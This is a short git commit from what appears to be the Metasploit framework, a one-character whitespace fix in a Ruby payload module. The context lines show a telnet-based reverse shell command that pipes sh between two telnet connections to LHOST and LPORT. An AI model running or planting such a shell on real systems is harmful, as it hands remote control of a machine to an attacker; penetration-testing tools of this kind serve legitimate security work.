git-svn-id: file:///home/svn/framework3/trunk@3765 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2006-07-27 21:03:24 +00:00
parent eb4b7ad1ad
commit c572f4cb8c
1 changed files with 1 additions and 1 deletions

View File

@ -48,7 +48,7 @@ module Reverse
"telnet #{datastore['LHOST']} #{datastore['LPORT']}|" +
"while : ; do sh && break; done 2>&1|" +
"telnet #{datastore['LHOST']} #{datastore['LPORT']}" +
">/dev/null 2>&1 &)"
" >/dev/null 2>&1 &)"
return cmd
end